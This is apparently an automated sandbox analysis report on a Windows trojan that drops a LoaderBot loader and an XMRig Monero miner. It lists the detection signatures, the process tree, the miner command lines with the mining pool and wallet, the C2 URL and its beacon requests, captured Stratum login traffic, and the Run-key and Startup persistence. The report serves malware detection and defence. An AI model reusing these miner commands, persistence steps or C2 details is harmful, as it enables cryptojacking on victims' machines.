
Windows Analysis Report
h2UFp4aCRq.exe

Overview

General Information

Sample name:h2UFp4aCRq.exe
renamed because original name is a hash value
Original sample name:1fecbc51b5620e578c48a12ebeb19bc2.exe
Analysis ID:1461232
MD5:1fecbc51b5620e578c48a12ebeb19bc2
SHA1:94fe551f4fb3ff76a0be99a962dc20fc2656453e
SHA256:9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
Tags:64, exe, trojan
Infos:

Detection

LoaderBot, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Xmrig
Snort IDS alert for network traffic
Yara detected LoaderBot
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Sigma detected: Potential Crypto Mining Activity
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • h2UFp4aCRq.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\h2UFp4aCRq.exe" MD5: 1FECBC51B5620E578C48A12EBEB19BC2)
    • cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rolex.exe (PID: 6584 cmdline: rolex.exe -priverdD MD5: 8866D677A3309A0AD903F37557C5941B)
        • yondex.exe (PID: 6936 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
          • Driver.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
            • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WerFault.exe (PID: 7400 cmdline: C:\Windows\system32\WerFault.exe -u -p 7280 -s 764 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • Driver.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
            • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WerFault.exe (PID: 7340 cmdline: C:\Windows\system32\WerFault.exe -u -p 7440 -s 552 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7344 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7384 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7400 cmdline: C:\Windows\system32\WerFault.exe -pss -s 208 -p 7440 -ip 7440 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7808 cmdline: C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 8052 cmdline: C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • yondex.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
  • yondex.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
  • yondex.exe (PID: 8064 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
    • Driver.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7724 cmdline: C:\Windows\system32\WerFault.exe -u -p 7424 -s 876 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Driver.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 692 cmdline: C:\Windows\system32\WerFault.exe -u -p 1712 -s 864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Driver.exe (PID: 3600 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name:xmrig
Description:According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": "https://cv99160.tw1.ru/cmd.php"}
Source: dump.pcap, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Rule: MALWARE_Win_CoinMiner04, Description: Detects coinmining malware, Author: ditekSHen, Strings:
      • 0x24ea:$s1: createDll
      • 0x27dc:$s2: getTasks
      • 0x2644:$s3: SetStartup
      • 0x2518:$s4: loadUrl
      • 0x26cd:$s5: Processer
      • 0x2849:$s6: checkProcess
      • 0x2856:$s7: runProcess
      • 0x26f5:$s8: createDir
      • 0x2a0b:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      • 0x2a9f:$cnc2: ?hwid=
      • 0x2acf:$cnc3: ?timeout=1
      • 0x2c01:$cnc4: &completed=
      • 0x2c45:$cnc5: /cmd.php
      Source: 0000001D.00000003.3496111858.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
      Source: 0000001D.00000003.3609636273.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
      Source: 00000015.00000002.3029846124.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
      Source: 00000005.00000002.1804831542.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
      Source: 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
                  Source: 4.0.yondex.exe.690000.0.unpack, Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Author: Joe Security
                  Source: 4.0.yondex.exe.690000.0.unpack, Rule: MALWARE_Win_CoinMiner04, Description: Detects coinmining malware, Author: ditekSHen, Strings:
                  • 0x24ea:$s1: createDll
                  • 0x27dc:$s2: getTasks
                  • 0x2644:$s3: SetStartup
                  • 0x2518:$s4: loadUrl
                  • 0x26cd:$s5: Processer
                  • 0x2849:$s6: checkProcess
                  • 0x2856:$s7: runProcess
                  • 0x26f5:$s8: createDir
                  • 0x2a0b:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                  • 0x2a9f:$cnc2: ?hwid=
                  • 0x2acf:$cnc3: ?timeout=1
                  • 0x2c01:$cnc4: &completed=
                  • 0x2c45:$cnc5: /cmd.php

                  Bitcoin Miner

                  Source: Process started; Author: Joe Security; Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ParentProcessId: 6936, ParentProcessName: yondex.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, ProcessId: 7280, ProcessName: Driver.exe

                  System Summary

                  Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ParentProcessId: 6936, ParentProcessName: yondex.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, ProcessId: 7280, ProcessName: Driver.exe
                  Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ProcessId: 6936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver
                  Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7344, ProcessName: svchost.exe

                  Data Obfuscation

                  Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ProcessId: 6936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
                  Timestamp:06/23/24-11:31:12.198589
                  SID:2047928
                  Source Port:49698
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected


                  AV Detection

                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Avira: detection malicious, Label: TR/ATRAPS.Gen
                  Source: 4.0.yondex.exe.690000.0.unpack, Malware Configuration Extractor: LoaderBot {"C2 url": "https://cv99160.tw1.ru/cmd.php"}
                  Source: pool.supportxmr.com, Virustotal: Detection: 9%
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe, Virustotal: Detection: 14%
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Virustotal: Detection: 67%
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ReversingLabs: Detection: 60%
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, Virustotal: Detection: 68%
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy), Virustotal: Detection: 67%
                  Source: h2UFp4aCRq.exe, ReversingLabs: Detection: 39%
                  Source: h2UFp4aCRq.exe, Virustotal: Detection: 56%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Joe Sandbox ML: detected

                  Bitcoin Miner

                  Source: Yara match, File source: dump.pcap, type: PCAP
                  Source: Yara match, File source: Process Memory Space: rolex.exe PID: 6584, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: yondex.exe PID: 6936, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: Driver.exe PID: 7280, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: Driver.exe PID: 7440, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: Driver.exe PID: 7424, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: Driver.exe PID: 1712, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: Driver.exe PID: 3600, type: MEMORYSTR
                  Source: global traffic, TCP traffic: 192.168.2.4:49732 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: global traffic, TCP traffic: 192.168.2.4:49797 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: global traffic, TCP traffic: 192.168.2.4:49825 -> 141.94.96.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: global traffic, TCP traffic: 192.168.2.4:49843 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: Driver.exe, String found in binary or memory: stratum+tcp://
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: @cryptonight/0cn
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, String found in binary or memory: XMRig 6.2.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49834 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49837 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49878 version: TLS 1.2
                  Source: h2UFp4aCRq.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdb source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdbP source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: h2UFp4aCRq.exe, rolex.exe.0.dr

                  Networking

                  Source: Traffic, Snort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.4:49698 -> 1.1.1.1:53
                  Source: Malware configuration extractor, URLs: https://cv99160.tw1.ru/cmd.php
                  Source: global traffic, TCP traffic: 192.168.2.4:49732 -> 141.94.96.144:3333
                  Source: global traffic, TCP traffic: 192.168.2.4:49825 -> 141.94.96.195:3333
                  Source: global traffic, TCP traffic: 192.168.2.4:49843 -> 141.94.96.71:3333
                  Source: Joe Sandbox View, IP Address: 141.94.96.195
                  Source: Joe Sandbox View, IP Address: 92.53.96.121
                  Source: Joe Sandbox View, IP Address: 141.94.96.71
                  Source: Joe Sandbox View, IP Address: 141.94.96.144
                  Source: Joe Sandbox View, ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox View, ASN Name: TIMEWEB-ASRU
                  Source: Joe Sandbox View, ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox View, ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global traffic, HTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0, Host: cv99160.tw1.ru, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0, Host: cv99160.tw1.ru
                  Source: global traffic, HTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0, Host: cv99160.tw1.ru
                  Source: global traffic | HTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 | Host: cv99160.tw1.ru | Connection: Keep-Alive
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global traffic HTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Host: cv99160.tw1.ru Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: cv99160.tw1.ru
                  Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cv99160.tw1.ru
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cv99160.tw1.rud
                  Source: yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw
